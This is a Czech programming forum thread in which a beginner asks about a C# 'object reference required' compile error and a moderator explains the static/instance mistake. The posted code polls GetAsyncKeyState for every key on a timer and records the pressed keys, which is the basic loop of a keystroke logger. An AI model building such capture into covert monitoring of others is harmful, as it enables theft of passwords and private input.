Diskuze: [C#]Error 1 An object reference is required for the non-static field, method, or property 'System.Windows.Forms.Control.Text.get'

C# .NET .NET (C# a Visual Basic) [C#]Error 1 An object reference is required for the non-static field, method, or property 'System.Windows.Forms.Control.Text.get' American English version English version

Avatar
Dominik Hošic
Redaktor
Avatar
Dominik Hošic:

Ahojte zacinam s C# a naskytla se mi tahle chyba :

Error   1       An object reference is required for the non-static field, method, or property 'System.Windows.Forms.Control.Text.get'   C:\Documents and Settings\Administrator\Local Settings\Data aplikací\Temporary Projects\XXXXXX\Form1.cs        30      13      XXXXXXXX

skript :

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace XXXXXXXXX
{
    public partial class txtResult : Form
    {
        [DllImport("User32.dll")]
        private static extern short GetAsyncKeyState(int vKey);
        public txtResult()
        {
            InitializeComponent();
        }

        private void timer1_Tick(object sender, EventArgs e)
        {
            string buffer = "";
            foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
            {
                if (GetAsyncKeyState(i) == -32767)
                    buffer += Enum.GetName(typeof(Keys), i);
            }
            txtResult.Text += buffer;
            }

    }
}

Nevite kde delam chybu prosim ?

Editováno 8.11.2012 20:45
Odpovědět 8.11.2012 20:44
Klient: Nefunguje mi internet co s tím uděláte? Operátor: a co vidíte na monitoru? Klient: No signal...
Avatar
David Čápka
Tým ITnetwork
Avatar
Odpovídá na Dominik Hošic
David Čápka:
txtResult.Text

nedává smysl, protože v tu chvíli nemáš instanci a není to statické. Zkus dát jen Text, ale to typuji, nevím, jak vypadá zbytek té třídy ani co to má dělat. Každopádně bys měl začínat s něčím jednodušším a přečíst si třeba sekci OOP v C# zde na devbooku.

Nahoru Odpovědět 8.11.2012 21:35
Miluji svou práci a zdejší komunitu, baví mě se rozvíjet, děkuji každému členovi za to, že zde působí.
Avatar
Dominik Hošic
Redaktor
Avatar
Dominik Hošic:

Uz jsem to vyresil :D Zapomel jsem si pojmenovat TextBox ja blbec :[

Nahoru Odpovědět 8.11.2012 22:50
Klient: Nefunguje mi internet co s tím uděláte? Operátor: a co vidíte na monitoru? Klient: No signal...
Děláme co je v našich silách, aby byly zdejší diskuze co nejkvalitnější. Proto do nich také mohou přispívat pouze registrovaní členové. Pro zapojení do diskuze se přihlas. Pokud ještě nemáš účet, zaregistruj se, je to zdarma.

Zobrazeno 3 zpráv z 3.